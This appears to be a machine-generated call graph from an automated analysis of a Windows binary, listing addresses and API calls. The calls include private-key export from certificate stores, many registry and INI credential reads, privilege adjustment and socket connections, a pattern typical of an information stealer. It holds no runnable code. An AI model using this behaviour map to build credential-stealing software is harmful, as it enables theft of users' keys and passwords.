40ffb5 ExitProcess 10668->10670 10671 40f81c 10673 40f824 10671->10673 10672 40f834 10673->10672 10681 4015f2 GetHGlobalFromStream 10673->10681 10675 40f849 10675->10672 10687 401658 GetHGlobalFromStream 10675->10687 10677 40f857 10677->10672 10678 40f85d 10677->10678 10695 4018c1 GetTickCount GetHGlobalFromStream 10678->10695 10680 40f865 10680->10672 10682 40160f 10681->10682 10684 40163c 10681->10684 10683 401617 GlobalLock 10682->10683 10683->10684 10685 401626 10683->10685 10684->10675 10686 401631 GlobalUnlock 10685->10686 10686->10684 10688 4016c2 10687->10688 10689 401675 10687->10689 10688->10677 10690 4016b2 10689->10690 10691 401686 GlobalLock 10689->10691 10690->10677 10692 401696 10691->10692 10694 4016c8 10691->10694 10693 4016a1 GlobalUnlock 10692->10693 10693->10694 10694->10677 10696 4018f1 10695->10696 10697 401986 10695->10697 10698 4018f9 GlobalLock 10696->10698 10697->10680 10698->10697 10699 401908 10698->10699 10705 401769 LocalAlloc 10699->10705 10701 401913 10702 401924 GlobalUnlock 10701->10702 10703 401941 10702->10703 10704 401752 LocalFree 10703->10704 10704->10697 10705->10701 10444 401226 ExitProcess 10445 401241 10444->10445 10446 401245 ReadFile 10444->10446 10447 401263 CloseHandle 10446->10447 10448 401271 10446->10448 10448->10446 10449 401289 CloseHandle 10448->10449 10450 40f8e7 10460 403c18 WSAStartup 10450->10460 10452 40f9d0 10453 40f9bc 10453->10452 10454 4024b2 19 API calls 10453->10454 10454->10452 10456 40f99b Sleep 10458 40f8ec 10456->10458 10458->10452 10458->10453 10458->10456 10459 40f6ce 6 API calls 10458->10459 10461 403bb4 10458->10461 10470 401995 GetHGlobalFromStream 10458->10470 10459->10458 10460->10458 10462 403bc3 10461->10462 10464 403c09 10461->10464 10463 403bc9 GetHGlobalFromStream 10462->10463 10462->10464 10463->10464 10465 403bd9 10463->10465 10464->10458 10466 403be1 GlobalLock 10465->10466 10466->10464 10467 403bf0 10466->10467 10480 403a02 10467->10480 10471 401a53 10470->10471 10472 4019b5 10470->10472 10471->10458 10472->10471 10473 4019ca GlobalLock 10472->10473 10473->10471 10474 4019d6 10473->10474 10561 401769 LocalAlloc 10474->10561 10476 4019e1 10477 4019f2 GlobalUnlock 10476->10477 10478 401a0b 10477->10478 10479 401752 LocalFree 10478->10479 10479->10471 10512 401769 LocalAlloc 10480->10512 10482 403a1d 10513 401769 LocalAlloc 10482->10513 10484 403a2a 10514 401769 LocalAlloc 10484->10514 10486 403a37 InternetCrackUrlA 10487 403a7e 10486->10487 10498 403a84 10486->10498 10488 403a89 InternetCreateUrlA 10487->10488 10487->10498 10490 403aae InternetCrackUrlA 10488->10490 10488->10498 10489 401752 LocalFree 10492 403b8e 10489->10492 10491 403aef 10490->10491 10490->10498 10493 403afa wsprintfA 10491->10493 10491->10498 10494 401752 LocalFree 10492->10494 10515 4035d5 socket 10493->10515 10496 403b96 10494->10496 10497 401752 LocalFree 10496->10497 10500 403b9e 10497->10500 10498->10489 10502 403bac GlobalUnlock 10500->10502 10504 401752 LocalFree 10500->10504 10502->10464 10503 403b33 lstrlen 10524 403659 10503->10524 10504->10502 10512->10482 10513->10484 10514->10486 10516 4035f0 10515->10516 10517 4035ee 10515->10517 10519 403623 10516->10519 10520 40359b 2 API calls 10516->10520 10522 403612 10516->10522 10517->10498 10523 4039d4 72A313D0 10517->10523 10518 403636 connect 10518->10517 10521 40364a closesocket 10518->10521 10519->10521 10520->10522 10521->10517 10522->10518 10522->10519 10523->10503 10561->10476 10949 40c169 10950 40c178 10949->10950 10951 40c17c MultiByteToWideChar 10949->10951 10961 401769 LocalAlloc 10951->10961 10953 40c199 MultiByteToWideChar StgOpenStorage 10956 40c1cd 10953->10956 10957 40c242 10953->10957 10954 401752 LocalFree 10955 40c25d 10954->10955 10956->10957 10962 401769 LocalAlloc 10956->10962 10957->10954 10959 40c202 10960 401752 LocalFree 10959->10960 10960->10957 10961->10953 10962->10959 10706 4029af 10707 4029b9 10706->10707 10709 4029d1 10707->10709 10710 40273d 10707->10710 10711 40274d 10710->10711 10712 40275f 10710->10712 10711->10712 10713 402766 LookupPrivilegeValueA 10711->10713 10712->10707 10714 402782 GetCurrentProcess OpenProcessToken 10713->10714 10719 4027dc 10713->10719 10717 4027c3 AdjustTokenPrivileges 10714->10717 10718 40279a 10714->10718 10715 4027e3 CloseHandle 10716 4027eb 10715->10716 10716->10707 10717->10719 10718->10717 10719->10715 10719->10716 7557 40f775 7558 40f77d 7557->7558 7561 40f566 7558->7561 7560 40f7a3 7562 40f579 7561->7562 7563 40f57a GetPEB 7561->7563 7562->7560 7566 40f59c 7563->7566 7564 40f66a 7564->7560 7566->7564 7647 4021df 7566->7647 7651 4065bd 7566->7651 7655 40cf3c 7566->7655 7665 40c63b 7566->7665 7688 409e39 7566->7688 7694 407336 7566->7694 7702 407435 7566->7702 7716 407ab3 7566->7716 7720 40e4b3 7566->7720 7724 406532 7566->7724 7734 4046b2 7566->7734 7748 408b31 7566->7748 7760 40e1b0 7566->7760 7764 40bdb0 7566->7764 7768 40bf30 7566->7768 7772 40dcaf 7566->7772 7776 4099ad 7566->7776 7791 40e02b 7566->7791 7801 409926 7566->7801 7809 40e725 7566->7809 7817 408825 7566->7817 7850 409da4 7566->7850 7860 40f322 7566->7860 7886 405b21 7566->7886 7892 40cfa0 7566->7892 7914 40be9d 7566->7914 7918 40421a 7566->7918 7944 40e099 7566->7944 7948 40be12 7566->7948 7960 40ea90 7566->7960 7966 40a68a 7566->7966 7974 40520a 7566->7974 8014 40d809 7566->8014 8018 407d06 7566->8018 8024 40c405 7566->8024 8055 409c84 7566->8055 8068 40d583 7566->8068 8078 407a02 7566->8078 8084 408c01 7566->8084 8092 40f401 7566->8092 8104 406900 7566->8104 8108 40beff 7566->8108 8112 409dfe 7566->8112 8116 40cb7d 7566->8116 8126 4066fd 7566->8126 8130 40da7d 7566->8130 8136 40e47d 7566->8136 8140 40627b 7566->8140 8144 40d378 7566->8144 8148 409bf8 7566->8148 8162 4065f8 7566->8162 8174 40ec75 7566->8174 8188 40abf4 7566->8188 8192 409b71 7566->8192 8200 40486e 7566->8200 8272 40c56c 7566->8272 8282 40716b 7566->8282 8288 409aea 7566->8288 8296 40e4e9 7566->8296 8322 405fe9 7566->8322 8326 405d68 7566->8326 8338 4056e8 7566->8338 8372 406c68 7566->8372 8414 404c68 7566->8414 8442 4058e7 7566->8442 8480 407267 7566->8480 8490 405a66 7566->8490 8498 409a63 7566->8498 8506 407661 7566->8506 8526 40e1e1 7566->8526 8530 40bde1 7566->8530 8534 404fe0 7566->8534 8561 40c756 7566->8561 8575 40c2d2 7566->8575 8583 40c7d0 7566->8583 8587 40bece 7566->8587 8591 40c34b 7566->8591 8599 407a4b 7566->8599 8609 40db44 7566->8609 8619 40d7c0 7566->8619 8625 406f40 7566->8625 7648 4021e8 7647->7648 7649 4021f4 7648->7649 7650 401752 LocalFree 7648->7650 7649->7566 7650->7648 7652 4065cf 7651->7652 8631 403fb9 7652->8631 7654 4065e9 7654->7566 7656 40cf4e 7655->7656 8869 40cc54 RegOpenKeyA 7656->8869 7659 40cc54 16 API calls 7660 40cf76 7659->7660 8881 40cead 7660->8881 7663 40cead 21 API calls 7664 40cf91 7663->7664 7664->7566 7674 40c64e 7665->7674 7666 40c69c 7668 401c86 7 API calls 7666->7668 7667 40c65c StrStrIA 7667->7674 7669 40c6a3 7668->7669 7671 40c6cb 7669->7671 7672 401c21 6 API calls 7669->7672 7673 401c86 7 API calls 7671->7673 7675 40c6b2 7672->7675 7676 40c6d2 7673->7676 7674->7666 7674->7667 7677 403f6e 41 API calls 7674->7677 7681 401752 LocalFree 7674->7681 8897 402200 7674->8897 7678 403f6e 41 API calls 7675->7678 7679 40c6fa 7676->7679 7680 401c21 6 API calls 7676->7680 7677->7674 7682 40c6c6 7678->7682 7679->7566 7683 40c6e1 7680->7683 7681->7674 7684 401752 LocalFree 7682->7684 7685 403f6e 41 API calls 7683->7685 7684->7671 7686 40c6f5 7685->7686 7687 401752 LocalFree 7686->7687 7687->7679 7689 409e4b 7688->7689 7690 403fb9 46 API calls 7689->7690 7691 409e65 7690->7691 7692 403fb9 46 API calls 7691->7692 7693 409e7c 7692->7693 7693->7566 7695 407348 7694->7695 8907 4072d5 7695->8907 7698 4072d5 46 API calls 7699 40735f 7698->7699 7700 4072d5 46 API calls 7699->7700 7701 407369 7700->7701 7701->7566 7703 407447 7702->7703 8920 407378 7703->8920 7706 407378 29 API calls 7707 407462 7706->7707 7708 407378 29 API calls 7707->7708 7709 40746e 7708->7709 7710 407378 29 API calls 7709->7710 7711 40747d 7710->7711 7712 407378 29 API calls 7711->7712 7713 40748c 7712->7713 7714 407378 29 API calls 7713->7714 7715 40749b 7714->7715 7715->7566 7717 407ac5 7716->7717 7718 403fb9 46 API calls 7717->7718 7719 407adf 7718->7719 7719->7566 7721 40e4c5 7720->7721 8951 40e43f 7721->8951 7723 40e4da 7723->7566 7725 406544 7724->7725 7726 403fb9 46 API calls 7725->7726 7727 40655e 7726->7727 7728 401b46 6 API calls 7727->7728 7731 406577 7728->7731 7729 4065a1 8974 4062ac RegOpenKeyA 7729->8974 7731->7729 7733 401752 LocalFree 7731->7733 7732 4065ae 7732->7566 7733->7729 7735 4046c4 7734->7735 8986 404538 RegOpenKeyA 7735->8986 7738 404538 14 API calls 7739 4046e1 7738->7739 7740 404538 14 API calls 7739->7740 7741 4046ee 7740->7741 8997 40442a RegOpenKeyA 7741->8997 7744 40442a 10 API calls 7745 404708 7744->7745 7746 40442a 10 API calls 7745->7746 7747 404715 7746->7747 7747->7566 7749 408b43 7748->7749 7750 403fb9 46 API calls 7749->7750 7751 408b5d 7750->7751 9006 408900 RegOpenKeyA 7751->9006 7754 408900 14 API calls 7755 408b82 7754->7755 9017 4089ef RegOpenKeyA 7755->9017 7758 4089ef 53 API calls 7759 408ba6 7758->7759 7759->7566 7761 40e1c2 7760->7761 9044 40e148 7761->9044 7763 40e1d2 7763->7566 7765 40bdc2 7764->7765 9056 40bd1f 7765->9056 7767 40bdd2 7767->7566 7769 40bf42 7768->7769 7770 40bd1f 46 API calls 7769->7770 7771 40bf52 7770->7771 7771->7566 7773 40dcc1 7772->7773 7774 40bd1f 46 API calls 7773->7774 7775 40dcd1 7774->7775 7775->7566 7777 4099c2 7776->7777 7778 401c86 7 API calls 7777->7778 7779 4099cc 7778->7779 7780 4099f4 GetCurrentDirectoryA 7779->7780 7781 401c21 6 API calls 7779->7781 9078 40981e StrStrIA 7780->9078 7783 4099db 7781->7783 7785 403f6e 41 API calls 7783->7785 7787 4099ef 7785->7787 7786 40981e 83 API calls 7788 409a48 SetCurrentDirectoryA 7786->7788 7789 401752 LocalFree 7787->7789 7790 409a5f 7788->7790 7789->7780 7790->7566 7792 40e03d 7791->7792 9287 40de19 RegOpenKeyA 7792->9287 7795 40de19 11 API calls 7796 40e065 7795->7796 9320 40df62 RegOpenKeyA 7796->9320 7799 40df62 31 API calls 7800 40e08a 7799->7800 7800->7566 9351 40156d 7801->9351 7803 40993b GetCurrentDirectoryA 7804 40981e 83 API calls 7803->7804 7805 409976 7804->7805 7806 40981e 83 API calls 7805->7806 7807 409992 SetCurrentDirectoryA 7806->7807 7808 4099a9 7807->7808 7808->7566 7810 40e737 7809->7810 9353 40e5db 7810->9353 7813 40e5db 49 API calls 7814 40e75f 7813->7814 7815 403fb9 46 API calls 7814->7815 7816 40e776 7815->7816 7816->7566 7818 408837 7817->7818 9371 408803 7818->9371 7821 408803 49 API calls 7822 40884e 7821->7822 7823 408803 49 API calls 7822->7823 7824 408858 7823->7824 7825 401b46 6 API calls 7824->7825 7826 40886f 7825->7826 7827 408873 7826->7827 7828 408887 7826->7828 9378 408543 7827->9378 7830 401b46 6 API calls 7828->7830 7832 40889e 7830->7832 7834 4088a2 7832->7834 7835 4088b6 7832->7835 7833 401752 LocalFree 7833->7828 7836 408543 38 API calls 7834->7836 7837 401b46 6 API calls 7835->7837 7838 4088b1 7836->7838 7839 4088c9 7837->7839 7840 401752 LocalFree 7838->7840 7841 4088f1 7839->7841 7842 402200 9 API calls 7839->7842 7840->7835 7841->7566 7843 4088d4 7842->7843 7844 4088d8 7843->7844 7845 4088ec 7843->7845 7851 409db6 7850->7851 7852 401b46 6 API calls 7851->7852 7853 409dcc 7852->7853 7854 409def 7853->7854 7855 402200 9 API calls 7853->7855 7854->7566 7856 409dd6 7855->7856 7857 403f6e 41 API calls 7856->7857 7858 409dea 7857->7858 7859 401752 LocalFree 7858->7859 7859->7854 7861 40f334 7860->7861 9511 40f2d0 7861->9511 7866 401bcd 5 API calls 7867 40f361 7866->7867 9525 40ef8e RegOpenKeyA 7867->9525 7870 401752 LocalFree 7871 40f37b 7870->7871 7872 401b46 6 API calls 7871->7872 7873 40f391 7872->7873 7874 40f3b5 7873->7874 7875 401c21 6 API calls 7873->7875 7876 40eeef 23 API calls 7874->7876 7877 40f3a0 7875->7877 7878 40f3c8 7876->7878 7879 40eeef 23 API calls 7877->7879 7880 40ef8e 26 API calls 7878->7880 7881 40f3b0 7879->7881 7882 40f3dd 7880->7882 7884 401752 LocalFree 7881->7884 7883 40ef8e 26 API calls 7882->7883 7885 40f3f2 7883->7885 7884->7874 7885->7566 7887 405b33 7886->7887 9597 405aa8 7887->9597 7890 405aa8 46 API calls 7891 405b5a 7890->7891 7891->7566 7894 40cfb4 7892->7894 7893 40d191 7893->7566 7894->7893 7895 40d01f CertOpenSystemStoreA 7894->7895 7895->7893 7899 40d039 7895->7899 7896 40d03b CertEnumCertificatesInStore 7897 40d04b CertCloseStore 7896->7897 7896->7899 7897->7893 7899->7896 7900 40d069 lstrcmp 7899->7900 7902 40d0a0 lstrcmp 7899->7902 7905 401752 LocalFree 7899->7905 9612 401769 LocalAlloc 7899->9612 7900->7899 7902->7899 7903 40d0b5 CryptAcquireCertificatePrivateKey 7902->7903 7903->7899 7904 40d0d2 CryptGetUserKey 7903->7904 7906 40d0e6 CryptExportKey 7904->7906 7907 40d15e CryptReleaseContext 7904->7907 7905->7899 7908 40d155 CryptDestroyKey 7906->7908 7909 40d0ff 7906->7909 7907->7899 7908->7907 9613 401769 LocalAlloc 7909->9613 7911 40d107 CryptExportKey 7913 40d124 7911->7913 7912 401752 LocalFree 7912->7908 7913->7912 7915 40beaf 7914->7915 7916 40bd1f 46 API calls 7915->7916 7917 40bebf 7916->7917 7917->7566 7919 404231 7918->7919 7920 404252 GetVersionExA 7919->7920 7921 404274 7920->7921 9614 404087 GetModuleHandleA 7921->9614 7923 4042ba 9620 401769 LocalAlloc 7923->9620 7925 4042cd GetLocaleInfoA 9621 40151c 7925->9621 7927 4042fc GetLocaleInfoA 7928 404325 7927->7928 9623 4040ef 7928->9623 7930 40432a 9631 404189 7930->9631 7945 40e0ab 7944->7945 7946 40bd1f 46 API calls 7945->7946 7947 40e0bb 7946->7947 7947->7566 7949 40be24 7948->7949 7950 40bd1f 46 API calls 7949->7950 7951 40be34 7950->7951 7952 401b46 6 API calls 7951->7952 7953 40be4b 7952->7953 7954 403dc3 41 API calls 7953->7954 7955 40be8e 7953->7955 7956 40be6c 7954->7956 7955->7566 7957 403dc3 41 API calls 7956->7957 7958 40be86 7957->7958 7959 401752 LocalFree 7958->7959 7959->7955 7961 40eaa2 7960->7961 9687 40e785 RegOpenKeyA 7961->9687 7964 40e785 18 API calls 7965 40eaca 7964->7965 7965->7566 7971 40a69c 7966->7971 7967 40a6c2 9699 40a457 CoCreateInstance 7967->9699 7971->7967 7973 40a040 CoTaskMemFree 7971->7973 7972 40a6f7 7972->7566 7973->7967 7975 40521c 7974->7975 9747 4050e5 7975->9747 7978 4050e5 24 API calls 7979 40524f 7978->7979 7980 4050e5 24 API calls 7979->7980 7981 405267 7980->7981 7982 4050e5 24 API calls 7981->7982 7983 40527f 7982->7983 7984 4050e5 24 API calls 7983->7984 7985 405297 7984->7985 7986 4050e5 24 API calls 7985->7986 7987 4052af 7986->7987 7988 4050e5 24 API calls 7987->7988 7989 4052c7 7988->7989 7990 4050e5 24 API calls 7989->7990 7991 4052df 7990->7991 8015 40d81b 8014->8015 8016 403fb9 46 API calls 8015->8016 8017 40d835 8016->8017 8017->7566 8019 407d18 8018->8019 9794 407aee RegOpenKeyA 8019->9794 8022 407aee 14 API calls 8023 407d40 8022->8023 8023->7566 8032 40c418 8024->8032 8025 40c426 StrStrIA 8025->8032 8026 40c46d 8027 403fb9 46 API calls 8026->8027 8028 40c484 8027->8028 8030 401b46 6 API calls 8028->8030 8029 402200 9 API calls 8029->8032 8031 40c49b 8030->8031 8033 401b46 6 API calls 8031->8033 8032->8025 8032->8026 8032->8029 8034 403f6e 41 API calls 8032->8034 8036 401752 LocalFree 8032->8036 8035 40c4b5 8033->8035 8034->8032 8037 401b46 6 API calls 8035->8037 8036->8032 8038 40c4cf 8037->8038 8039 401b46 6 API calls 8038->8039 8042 40c4eb 8039->8042 8040 40c52e 8041 401752 LocalFree 8040->8041 8043 40c544 8041->8043 8042->8040 8046 401548 lstrlen 8042->8046 8044 401752 LocalFree 8043->8044 8045 40c54c 8044->8045 8047 401752 LocalFree 8045->8047 8049 40c518 8046->8049 8048 40c554 8047->8048 8051 401548 lstrlen 8049->8051 8053 40c523 8051->8053 8054 401548 lstrlen 8053->8054 8054->8040 8056 409c98 8055->8056 8057 401c86 7 API calls 8056->8057 8058 409ca2 8057->8058 8059 403f6e 41 API calls 8058->8059 8066 409cbf 8058->8066 8061 409cba 8059->8061 8060 409cd0 StrStrIA 8060->8066 8063 401752 LocalFree 8061->8063 8062 409d15 8062->7566 8063->8066 8064 402200 9 API calls 8064->8066 8065 403f6e 41 API calls 8065->8066 8066->8060 8066->8062 8066->8064 8066->8065 8067 401752 LocalFree 8066->8067 8067->8066 8069 40d595 8068->8069 9805 40d547 8069->9805 8072 40d547 46 API calls 8073 40d5ac 8072->8073 8074 40d547 46 API calls 8073->8074 8075 40d5b6 8074->8075 8076 403fb9 46 API calls 8075->8076 8077 40d5cd 8076->8077 8077->7566 8079 407a14 8078->8079 9814 40779c RegOpenKeyA 8079->9814 8082 40779c 14 API calls 8083 407a3c 8082->8083 8083->7566 8085 408c13 8084->8085 9825 408bb5 8085->9825 8088 408bb5 46 API calls 8089 408c2a 8088->8089 8090 408bb5 46 API calls 8089->8090 8091 408c34 8090->8091 8091->7566 8093 40156d 8092->8093 8094 40f416 GetCurrentDirectoryA 8093->8094 8095 40981e 83 API calls 8094->8095 8096 40f451 8095->8096 8097 40981e 83 API calls 8096->8097 8098 40f46d SetCurrentDirectoryA GetCurrentDirectoryA 8097->8098 8099 40981e 83 API calls 8098->8099 8100 40f4b1 8099->8100 8101 40981e 83 API calls 8100->8101 8102 40f4cd SetCurrentDirectoryA 8101->8102 8103 40f4e4 8102->8103 8103->7566 8105 406912 8104->8105 9836 406738 RegOpenKeyA 8105->9836 8107 406922 8107->7566 8109 40bf11 8108->8109 8110 40bd1f 46 API calls 8109->8110 8111 40bf21 8110->8111 8111->7566 8113 409e10 8112->8113 8114 403fb9 46 API calls 8113->8114 8115 409e2a 8114->8115 8115->7566 8117 40cb8f 8116->8117 9846 40c8bc 8117->9846 8120 401c86 7 API calls 8122 40cba1 8120->8122 8121 40cbc3 8121->7566 8122->8121 8123 403dc3 41 API calls 8122->8123 8124 40cbbe 8123->8124 8125 401752 LocalFree 8124->8125 8125->8121 8127 40670f 8126->8127 8128 403fb9 46 API calls 8127->8128 8129 406729 8128->8129 8129->7566 8131 40da8f 8130->8131 9869 40d844 RegOpenKeyA 8131->9869 8134 40d844 14 API calls 8135 40dab7 8134->8135 8135->7566 8137 40e48f 8136->8137 8138 40e43f 46 API calls 8137->8138 8139 40e4a4 8138->8139 8139->7566 8141 40628d 8140->8141 9880 40601a RegOpenKeyA 8141->9880 8143 40629d 8143->7566 8145 40d38a 8144->8145 9891 40d1a2 RegOpenKeyA 8145->9891 8147 40d39a 8147->7566 8149 409c0a 8148->8149 8150 401b46 6 API calls 8149->8150 8151 409c24 8150->8151 8152 409c41 8151->8152 8153 403f6e 41 API calls 8151->8153 8154 401b46 6 API calls 8152->8154 8155 409c3c 8153->8155 8158 409c58 8154->8158 8156 401752 LocalFree 8155->8156 8156->8152 8157 409c75 8157->7566 8158->8157 8159 403f6e 41 API calls 8158->8159 8160 409c70 8159->8160 8161 401752 LocalFree 8160->8161 8161->8157 8163 40660a 8162->8163 8164 403fb9 46 API calls 8163->8164 8165 40662b 8164->8165 8166 401b46 6 API calls 8165->8166 8167 406642 8166->8167 8168 401c21 6 API calls 8167->8168 8169 40666a 8167->8169 8170 406651 8168->8170 8169->7566 8171 403f6e 41 API calls 8170->8171 8172 406665 8171->8172 8173 401752 LocalFree 8172->8173 8173->8169 8175 40ec87 8174->8175 8176 403fb9 46 API calls 8175->8176 8177 40eca1 8176->8177 8178 403fb9 46 API calls 8177->8178 8179 40ecb8 8178->8179 8180 403fb9 46 API calls 8179->8180 8181 40eccf 8180->8181 8182 403fb9 46 API calls 8181->8182 8183 40ece6 8182->8183 9902 40eb4e 8183->9902 8189 40ac06 8188->8189 9943 40aab9 RegOpenKeyA 8189->9943 8191 40ac16 8191->7566 8193 40156d 8192->8193 8194 409b86 GetCurrentDirectoryA 8193->8194 8195 40981e 83 API calls 8194->8195 8196 409bc1 8195->8196 8197 40981e 83 API calls 8196->8197 8198 409bdd SetCurrentDirectoryA 8197->8198 8199 409bf4 8198->8199 8199->7566 8201 404880 8200->8201 10031 401769 LocalAlloc 8201->10031 8203 40488d GetWindowsDirectoryA 8204 4048a1 8203->8204 8205 4048b5 8203->8205 8204->8205 8206 4048a8 8204->8206 8207 401752 LocalFree 8205->8207 10032 40473b 8206->10032 8209 4048b3 8207->8209 8210 401c86 7 API calls 8209->8210 8211 4048c4 8210->8211 8212 40473b 28 API calls 8211->8212 8213 4048cd 8212->8213 8214 401c86 7 API calls 8213->8214 8215 4048d4 8214->8215 8216 4048ec 8215->8216 8217 401c21 6 API calls 8215->8217 8218 401c86 7 API calls 8216->8218 8219 4048e3 8217->8219 8220 4048f3 8218->8220 8221 40473b 28 API calls 8219->8221 8222 40490b 8220->8222 8224 401c21 6 API calls 8220->8224 8221->8216 8223 401c86 7 API calls 8222->8223 8225 404912 8223->8225 8226 404902 8224->8226 8227 40492a 8225->8227 8229 401c21 6 API calls 8225->8229 8228 40473b 28 API calls 8226->8228 8230 401b46 6 API calls 8227->8230 8228->8222 8273 40c57e 8272->8273 8274 401b46 6 API calls 8273->8274 8275 40c594 8274->8275 8276 402200 9 API calls 8275->8276 8277 40c5bb 8275->8277 8278 40c59e 8276->8278 8277->7566 8278->8277 8279 403f6e 41 API calls 8278->8279 8280 40c5b6 8279->8280 8281 401752 LocalFree 8280->8281 8281->8277 8283 40717d 8282->8283 10087 406f89 RegOpenKeyA 8283->10087 8286 406f89 14 API calls 8287 4071a5 8286->8287 8287->7566 8289 40156d 8288->8289 8290 409aff GetCurrentDirectoryA 8289->8290 8291 40981e 83 API calls 8290->8291 8292 409b3a 8291->8292 8293 40981e 83 API calls 8292->8293 8294 409b56 SetCurrentDirectoryA 8293->8294 8295 409b6d 8294->8295 8295->7566 8297 40e4fb 8296->8297 8298 401b46 6 API calls 8297->8298 8299 40e515 8298->8299 8300 40e532 8299->8300 8302 403f6e 41 API calls 8299->8302 8301 401b46 6 API calls 8300->8301 8303 40e548 8301->8303 8304 40e52d 8302->8304 8305 40e565 8303->8305 8307 403f6e 41 API calls 8303->8307 8306 401752 LocalFree 8304->8306 8308 401b46 6 API calls 8305->8308 8306->8300 8309 40e560 8307->8309 8310 40e57c 8308->8310 8311 401752 LocalFree 8309->8311 8312 40e599 8310->8312 8313 403f6e 41 API calls 8310->8313 8311->8305 8314 401b46 6 API calls 8312->8314 8316 40e594 8313->8316 8315 40e5af 8314->8315 8318 403f6e 41 API calls 8315->8318 8319 40e5cc 8315->8319 8317 401752 LocalFree 8316->8317 8317->8312 8320 40e5c7 8318->8320 8319->7566 8321 401752 LocalFree 8320->8321 8321->8319 8323 405ffb 8322->8323 10098 405e01 RegOpenKeyA 8323->10098 8325 40600b 8325->7566 8327 405d7a 8326->8327 8328 401b46 6 API calls 8327->8328 8331 405d96 8328->8331 8329 405db1 8330 401b46 6 API calls 8329->8330 8335 405dca 8330->8335 8331->8329 8332 401752 LocalFree 8331->8332 8332->8329 8333 405de5 10109 405b69 RegOpenKeyA 8333->10109 8335->8333 8336 401752 LocalFree 8335->8336 8336->8333 8337 405df2 8337->7566 8339 4056fa 8338->8339 10119 4055c1 8339->10119 8373 406c7a 8372->8373 10199 406931 RegOpenKeyA 8373->10199 8376 401b46 6 API calls 8377 406ca1 8376->8377 8378 406cbf 8377->8378 8379 401c21 6 API calls 8377->8379 8380 401c86 7 API calls 8378->8380 8382 406cb0 8379->8382 8381 406cc6 8380->8381 8383 406cef 8381->8383 8385 401c21 6 API calls 8381->8385 8384 406b9d 20 API calls 8382->8384 8386 401c86 7 API calls 8383->8386 8387 406cba 8384->8387 8388 406cd5 8385->8388 8389 406cf6 8386->8389 8390 401752 LocalFree 8387->8390 8391 401c21 6 API calls 8388->8391 8392 406d1f 8389->8392 8395 401c21 6 API calls 8389->8395 8390->8378 8393 406ce0 8391->8393 8394 401c86 7 API calls 8392->8394 10210 406b9d 8393->10210 8397 406d26 8394->8397 8398 406d05 8395->8398 8400 406d4f 8397->8400 8404 401c21 6 API calls 8397->8404 8401 401c21 6 API calls 8398->8401 8399 406cea 8403 401752 LocalFree 8399->8403 8400->7566 8402 406d10 8401->8402 8405 406b9d 20 API calls 8402->8405 8403->8383 8406 406d35 8404->8406 8407 406d1a 8405->8407 8408 401c21 6 API calls 8406->8408 8409 401752 LocalFree 8407->8409 8410 406d40 8408->8410 8409->8392 8411 406b9d 20 API calls 8410->8411 8412 406d4a 8411->8412 8415 40156d 8414->8415 8416 404c7d GetWindowsDirectoryA 8415->8416 8417 404c99 8416->8417 8418 404d3c 8416->8418 8417->8418 8421 401bcd 5 API calls 8417->8421 8419 401c86 7 API calls 8418->8419 8420 404d43 8419->8420 8422 404d63 8420->8422 8424 401c21 6 API calls 8420->8424 8423 404cb5 GetPrivateProfileStringA 8421->8423 10264 404c1c 8422->10264 8425 404ce5 8423->8425 8426 404cf6 GetPrivateProfileStringA 8423->8426 8428 404d52 8424->8428 8429 404a90 31 API calls 8425->8429 8431 404d20 8426->8431 8432 404d31 8426->8432 10236 404a90 8428->10236 8429->8426 8435 404a90 31 API calls 8431->8435 8436 401752 LocalFree 8432->8436 8434 404c1c 36 API calls 8438 404d81 8434->8438 8435->8432 8436->8418 8440 404c1c 36 API calls 8438->8440 8439 401752 LocalFree 8439->8422 8441 404d90 8440->8441 8441->7566 8443 4058f9 8442->8443 8444 401b46 6 API calls 8443->8444 8445 405913 8444->8445 8446 40592b 8445->8446 8448 403c89 16 API calls 8445->8448 8447 401b46 6 API calls 8446->8447 8449 405942 8447->8449 8450 405926 8448->8450 8452 40595a 8449->8452 8453 403c89 16 API calls 8449->8453 8451 401752 LocalFree 8450->8451 8451->8446 8454 401b46 6 API calls 8452->8454 8455 405955 8453->8455 8456 405971 8454->8456 8457 401752 LocalFree 8455->8457 8458 405984 8456->8458 10287 405889 8456->10287 8457->8452 8459 401b46 6 API calls 8458->8459 8461 40599b 8459->8461 8463 4059ae 8461->8463 8465 405889 41 API calls 8461->8465 8466 401b46 6 API calls 8463->8466 8464 401752 LocalFree 8464->8458 8467 4059a9 8465->8467 8468 4059c5 8466->8468 8469 401752 LocalFree 8467->8469 8470 4059d8 8468->8470 8471 405889 41 API calls 8468->8471 8469->8463 10278 4058ba 8470->10278 8473 4059d3 8471->8473 8476 401752 LocalFree 8473->8476 8476->8470 8481 407279 8480->8481 10292 4071b4 RegOpenKeyA 8481->10292 8484 4071b4 9 API calls 8485 4072a1 8484->8485 8486 4071b4 9 API calls 8485->8486 8487 4072b4 8486->8487 8488 4071b4 9 API calls 8487->8488 8489 4072c6 8488->8489 8489->7566 8491 405a78 8490->8491 10300 405a05 8491->10300 8494 405a05 46 API calls 8495 405a8f 8494->8495 8496 405a05 46 API calls 8495->8496 8497 405a99 8496->8497 8497->7566 8499 40156d 8498->8499 8500 409a78 GetCurrentDirectoryA 8499->8500 8501 40981e 83 API calls 8500->8501 8502 409ab3 8501->8502 8503 40981e 83 API calls 8502->8503 8504 409acf SetCurrentDirectoryA 8503->8504 8505 409ae6 8504->8505 8505->7566 8517 407675 8506->8517 8507 407748 10313 407615 8507->10313 8508 40768d StrStrA 8510 4076ea StrStrIA 8508->8510 8508->8517 8510->8517 8512 4076a6 lstrlen 8515 402200 9 API calls 8512->8515 8513 407615 46 API calls 8516 40775c 8513->8516 8514 402200 9 API calls 8514->8517 8515->8517 8519 407615 46 API calls 8516->8519 8517->8507 8517->8508 8517->8512 8517->8514 8518 403f6e 41 API calls 8517->8518 8523 401752 LocalFree 8517->8523 8518->8517 8520 407766 8519->8520 10324 4074aa RegOpenKeyA 8520->10324 8523->8517 8524 4074aa 48 API calls 8525 40778b 8524->8525 8525->7566 8527 40e1f3 8526->8527 8528 403fb9 46 API calls 8527->8528 8529 40e20d 8528->8529 8529->7566 8531 40bdf3 8530->8531 8532 40bd1f 46 API calls 8531->8532 8533 40be03 8532->8533 8533->7566 8537 404ff3 8534->8537 8535 405001 StrStrIA 8535->8537 8536 40503c 10335 404f37 8536->10335 8537->8535 8537->8536 8539 402200 9 API calls 8537->8539 8547 401752 LocalFree 8537->8547 10369 404e00 8537->10369 8539->8537 8541 404f37 34 API calls 8542 405050 8541->8542 8544 404f37 34 API calls 8542->8544 8545 40505a 8544->8545 8546 404f37 34 API calls 8545->8546 8548 405064 8546->8548 